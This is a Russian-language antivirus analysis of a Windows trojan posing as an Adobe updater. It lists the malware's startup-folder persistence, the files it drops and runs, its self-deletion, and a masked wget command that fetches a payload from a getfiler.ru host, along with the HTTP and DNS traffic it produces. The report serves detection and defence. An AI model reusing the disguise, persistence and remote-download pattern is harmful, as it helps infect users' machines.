Техническая информация
Для обеспечения автозапуска и распространения:
Создает или изменяет следующие файлы:
- %HOMEPATH%\Start Menu\Programs\Startup\adobe-updater.lnk
Вредоносные функции:
Создает и запускает на исполнение:
- '%TEMP%\deleter.exe' /sfx=<Полный путь к вирусу>
- '%PROGRAM_FILES%\Adobe\wget.exe' -cN --waitretry=3 -t3 -T10 "http://ad#####date.getfiler.ru/get_file?si##################################################################################################################################################################################################################"
- '%PROGRAM_FILES%\Adobe\adobe-updater.exe'
- '%PROGRAM_FILES%\AutoFree Weather\autofree-weather.exe'
Изменения в файловой системе:
Создает следующие файлы:
- %PROGRAM_FILES%\AutoFree Weather\autofree-weather.exe
- %TEMP%\deleter.exe
- %PROGRAM_FILES%\Adobe\get_file@sid=12802&url=aHR0cDovL2FpaGRvd25sb2FkLmFkb2JlLmNvbS9iaW4vbGl2ZS9pbnN0YWxsX2ZsYXNocGxheWVyMTF4MzJfbXNzZF9hYWFfYWloLmV4ZQ==&name=aW5zdGFsbF9mbGFzaHBsYXllcjExeDMyX21zc2RfYWFhX2FpaC5leGU=&type=c2V0dXA=&size=MTA3NQ==
- %TEMP%\nsl2.tmp\System.dll
- %PROGRAM_FILES%\Adobe\adobe-updater.exe
- %PROGRAM_FILES%\Adobe\wget.exe
Удаляет следующие файлы:
- %TEMP%\nsl2.tmp\System.dll
Самоудаляется.
Сетевая активность:
Подключается к:
- 'ad#####date.getfiler.ru':80
TCP:
Запросы HTTP GET:
- ad#####date.getfiler.ru/get_file?si##################################################################################################################################################################################################################
UDP:
- DNS ASK ad#####date.getfiler.ru
